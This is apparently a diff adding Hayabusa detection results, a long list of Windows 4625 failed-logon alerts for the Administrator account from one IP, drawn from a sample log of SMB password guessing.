+2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 54GbW769j1x27mrI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bZSkhwZXc1SSknDT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 05AuqlN44x7oJGoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ4A6ReTVTcFCFeN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T7U6i4CMrL0bHouf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaeA4uZ6o8BRbzwf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MEnlL5BHmlCrtk7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNMpwAAaTsyzPfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oBtHQkRWIoq5hfn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5pkk9lgqMQ4wxQel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQVan7kRDOlnim50 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9282GqsC7UiUMbRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3lj7GjYryW9wjGgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPy4iUy5WBSLUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kvD9DEuos8SRrLH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NH1EnMG6fTvcz4QR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqHDXSQn8gkl2LJy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWI9XDDHjs2xcNB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zo53mEz6nal5Gxff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtOgC6wqMoNYVxId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdadoJYvD7DYjlSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U1xjdqjT9h0KUqG2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfkzZBvO4onYx6JZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JqY8CvyODDLQV9Ps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPMRIxRVuh13jmZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jARkTWdKTfTIwlug | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zwhkc71Nfn7QDf7c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qsYad9PgEajlYqvo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9YPw0DsspVbrOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsHpLCOdAOPFM6nD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcNytOhGOZKaREL9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lc5boBVigHE1ccGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQXg4ZHdBYHyiTTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JebTJzyn91NrpvkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wCE5ypjEU5feEEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OglsROoqX48xm0gJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bNC9ES3l3KwXPxb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: byPavQuiscMm7CMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQESAC3XpxCJJfG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5aYRnzirSj0PNXAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8s9xJ659geFHOlY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yBQdyO0diiFixwlx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzULtccOFnLIRiVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pDEGzqTAyUab5P8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gomgb26W9qFacRr7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXOcDu88S5c5VwwV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WHRnzgQkfAhsUguj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0Q9ZIaRK43W9apv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2xvriGeIlDwtzS36 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pDYTFqeJC61Nneef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0LNR7xCHW9x2q2qc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AE4EBj8X5IfXO8ZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BEOSGw6TjZf9GWS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UCxe24uL4A6R9kgZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8v4DcIRkx43KCIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CY2buVupQ5oR1Cp5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f6c3MlpMEzkCVud2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2wV6op9AU4paDXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNn6aywSs67hVAO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wUa03SIX69WCIYbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zYi4TB42B2VQm5Tr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9mnUbGMnlrOR8Tv4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CJGMWqgmbXABdPvB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2W9BbDYgC6vhqU3o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6DYsaih1Yhb2uOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q4o93QpJL4pxx94q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lQf1OsHb4lpgMPbl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcJUYelneVqBQjr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I0d6daEeIadJRbBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQ1hvZeT9aulbu4g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75RBCjr2eRDLhTqW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: maMlpuzhleuQHhIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkpNfbOHUr7cY52z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7SUyYbLPfPAGUfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
